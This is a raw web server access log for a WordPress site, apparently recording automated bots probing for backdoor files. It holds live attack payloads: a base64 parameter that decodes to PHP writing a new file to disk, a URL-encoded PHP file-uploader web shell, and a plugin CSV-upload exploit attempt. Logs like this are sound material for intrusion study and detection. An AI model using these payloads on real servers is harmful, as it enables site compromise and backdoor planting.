35.181.43.16 - - [18/May/2025:15:50:07 -0400] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 200 205 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
47.238.13.6 - - [18/May/2025:15:50:10 -0400] "GET /items/jqltd78/1105?key=student HTTP/1.1" 500 271 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:50:10 -0400] "GET /epinyins.php HTTP/1.1" 200 206 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:50:12 -0400] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 200 203 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.204.226.18 - - [18/May/2025:15:50:29 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
35.181.43.16 - - [18/May/2025:15:50:42 -0400] "GET /wp/wp-content/themes/sketch/404.php HTTP/1.1" 200 205 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:50:46 -0400] "GET /wordpress/wp-content/themes/sketch/404.php HTTP/1.1" 200 206 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:50:48 -0400] "GET /blog/wp-content/themes/sketch/404.php HTTP/1.1" 200 207 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:50:49 -0400] "GET /site/wp-content/themes/sketch/404.php HTTP/1.1" 200 206 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
47.238.13.12 - - [18/May/2025:15:50:58 -0400] "GET /sitemap-subkey-1408.xml HTTP/1.1" 200 99734 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:51:13 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.182.50 - - [18/May/2025:15:51:17 -0400] "GET /wp-includes/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-includes/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.204.226.18 - - [18/May/2025:15:51:10 -0400] "GET /wp-content/install.php HTTP/1.1" 200 0 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
47.238.13.2 - - [18/May/2025:15:51:48 -0400] "GET /aircraft/j281?pid=48971 HTTP/1.1" 500 271 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:09 -0400] "GET /plugins/function.php HTTP/1.1" 500 21 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:19 -0400] "GET /file/function.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:22 -0400] "GET /as/function HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:25 -0400] "GET /mah/function.php HTTP/1.1" 500 21 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:28 -0400] "GET /admin/function.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:32 -0400] "GET /about/function.php HTTP/1.1" 500 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:33 -0400] "POST //wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload HTTP/1.1" 200 205 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:33 -0400] "GET //wp-content/uploads/mfw-activity-logger/csv-uploads/db.php HTTP/1.1" 403 0 "-" "python-requests/2.27.1"
35.181.43.16 - - [18/May/2025:15:52:47 -0400] "GET /doc/function.php HTTP/1.1" 500 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:51 -0400] "GET /about/function.php HTTP/1.1" 500 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:52:52 -0400] "GET /index/function.php HTTP/1.1" 500 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.204.226.18 - - [18/May/2025:15:53:30 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
212.11.64.144 - - [18/May/2025:15:53:33 -0400] "GET //themes/wollson/assets/wsoyanzupdate0208.php HTTP/1.1" 500 271 "http://jenniferflo.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:53:27 -0400] "GET /wp-content/install.php HTTP/1.1" 200 0 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
35.181.43.16 - - [18/May/2025:15:53:38 -0400] "GET /wp-content/themes/themes/Cyb3r.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:53:39 -0400] "GET /wp-content/plugins/plugins/Cyb3r.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:53:40 -0400] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:53:43 -0400] "GET /wp-includes/SimplePie/Content/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:53:46 -0400] "GET /packed.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:53:48 -0400] "GET /wp-content/packed.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
47.238.13.12 - - [18/May/2025:15:53:49 -0400] "GET /sitemap-subkey-1884.xml HTTP/1.1" 200 100035 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:54:03 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.204.226.18 - - [18/May/2025:15:54:00 -0400] "GET /wp-content/install.php HTTP/1.1" 200 0 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.204.226.18 - - [18/May/2025:15:54:19 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.204.226.18 - - [18/May/2025:15:54:57 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
35.181.43.16 - - [18/May/2025:15:54:59 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3Jka3VyLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 200 205 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.181.43.16 - - [18/May/2025:15:54:59 -0400] "GET /simple.php HTTP/1.1" 200 206 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:01 -0400] "GET /class.api.php HTTP/1.1" 200 207 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:18 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:23 -0400] "GET /wp-admin/js/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
47.238.13.12 - - [18/May/2025:15:55:23 -0400] "GET /items/vjkco294/7003?key=piano HTTP/1.1" 500 271 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:30 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 200 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:32 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:33 -0400] "GET /wp-includes/SimplePie/Content/Type/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:39 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3J2ZGF4LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 200 206 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:40 -0400] "GET /simple.php HTTP/1.1" 200 206 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:41 -0400] "GET /class.api.php HTTP/1.1" 200 207 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:44 -0400] "GET /wp-includes/Requests/Auth/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.204.226.18 - - [18/May/2025:15:55:44 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
35.181.43.16 - - [18/May/2025:15:55:49 -0400] "GET /wp-admin/css/colors/index.php HTTP/1.1" 500 21 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:52 -0400] "GET /wp-22.php?sfilename=clsleaklqfh2.php&sfilecontent=%3C?php%20echo%20%27https%3A%2F%2Ft.me%2Fclsleak%20Uploader%3Cbr%3E%27;echo%20%27%3Cbr%3E%27;echo%20%27%3Cform%20action=%22%22%20method=%22post%22%20enctype=%22multipart/form-data%22%20name=%22uploader%22%20id=%22uploader%22%3E%27;echo%20%27%3Cinput%20type=%22file%22%20name=%22file%22%20size=%2250%22%3E%3Cinput%20name=%22_upl%22%20type=%22submit%22%20id=%22_upl%22%20value=%22Upload%22%3E%20%3C/form%3E%27;if(%20$_POST%5B%27_upl%27%5D%20==%20%22Upload%22%20)%20%7Bif(@copy($_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D,%20$_FILES%5B%27file%27%5D%5B%27name%27%5D))%20%7B%20echo%20%27%3Cb%3EUpload%20!!!%3C/b%3E%3Cbr%3E%3Cbr%3E%27;%20%7Delse%20%7B%20echo%20%27%3Cb%3EUpload%20!!!%3C/b%3E%3Cbr%3E%3Cbr%3E%27;%7D%7D?%3E&supfiles=clsleaklqfh2.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
198.204.226.18 - - [18/May/2025:15:55:41 -0400] "GET /wp-content/install.php HTTP/1.1" 200 0 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
35.181.43.16 - - [18/May/2025:15:55:52 -0400] "GET /wp-content/languages/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:57 -0400] "GET /wp-content/upgrade/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:55:58 -0400] "GET /wp-content/IXR/index.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:05 -0400] "POST /class-db.php?task=upload_files HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:05 -0400] "GET /bads.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:05 -0400] "GET /class-db.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:06 -0400] "POST /wp-content/class-db.php?task=upload_files HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:06 -0400] "GET /wp-content/bads.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:06 -0400] "GET /wp-content/class-db.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:07 -0400] "POST /wp-includes/class-db.php?task=upload_files HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:07 -0400] "GET /wp-includes/bads.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:07 -0400] "GET /wp-includes/class-db.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:08 -0400] "POST /wp-admin/class-db.php?task=upload_files HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:56:08 -0400] "GET /wp-admin/bads.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:56:08 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
35.181.43.16 - - [18/May/2025:15:56:08 -0400] "GET /wp-admin/class-db.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
47.238.13.1 - - [18/May/2025:15:56:21 -0400] "GET /sitemap-subkey-2930.xml HTTP/1.1" 200 100827 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:56:23 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.204.226.18 - - [18/May/2025:15:56:35 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
47.243.161.234 - - [18/May/2025:15:56:56 -0400] "GET /items/kypdx202/36515?key=back HTTP/1.1" 500 271 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:57:03 -0400] "GET //wp-admin/css/autoload_classmap.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
47.238.13.7 - - [18/May/2025:15:57:13 -0400] "GET /suite/y111?pid=18433 HTTP/1.1" 500 271 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:57:16 -0400] "GET //wp-admin/images/autoload_classmap.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
212.11.64.144 - - [18/May/2025:15:57:18 -0400] "GET //themes/romainmazb-bootstrap-boilerplate/assets/wsoyanzupdate0208.php HTTP/1.1" 500 271 "http://jenniferflo.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:57:19 -0400] "GET //wp-includes/pomo/autoload_classmap.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:57:20 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
35.181.43.16 - - [18/May/2025:15:57:23 -0400] "GET //wp-includes/block-patterns/autoload_classmap.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:57:27 -0400] "GET //wp-includes/js/autoload_classmap.php HTTP/1.1" 500 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:57:16 -0400] "GET /wp-content/install.php HTTP/1.1" 200 0 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
35.181.43.16 - - [18/May/2025:15:57:36 -0400] "GET //wp-includes/sitemaps/autoload_classmap.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:57:41 -0400] "GET //wp-includes/SimplePie/autoload_classmap.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:57:55 -0400] "GET //wp-includes/widgets/autoload_classmap.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
35.181.43.16 - - [18/May/2025:15:58:01 -0400] "GET //wp-content/uploads/autoload_classmap.php HTTP/1.1" 500 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:58:12 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
47.238.13.7 - - [18/May/2025:15:58:17 -0400] "GET /force/u70?pid=760 HTTP/1.1" 500 271 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
198.204.226.18 - - [18/May/2025:15:58:56 -0400] "GET /wp-content/install.php HTTP/1.1" 200 10 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.204.226.18 - - [18/May/2025:15:58:53 -0400] "GET /wp-content/install.php HTTP/1.1" 200 0 "http://jenniferflo.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
